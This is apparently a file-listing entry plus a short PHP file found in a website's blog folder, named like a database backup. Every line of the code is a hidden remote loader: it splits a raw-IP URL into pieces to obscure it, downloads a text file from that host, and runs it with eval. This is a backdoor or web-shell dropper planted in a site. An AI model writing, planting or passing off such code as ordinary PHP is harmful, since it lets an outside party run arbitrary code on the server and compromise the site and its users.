File "db-20260617080742.php"
Full Path: /home/asdasd9/za-ra.com/blog/db-20260617080742.php
File size: 625 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
try {
// URL dipecah menjadi beberapa bagian
$urlParts = [
'http://',
'198.204.225.86',
'/',
'j250925_13/',
'init',
'.txt'
];
$realUrl = implode('', $urlParts);
$c = curl_init($realUrl);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
eval('?>' . $result);
}
} catch (Exception $e) {
error_log('External script error: ' . $e->getMessage());
}
?>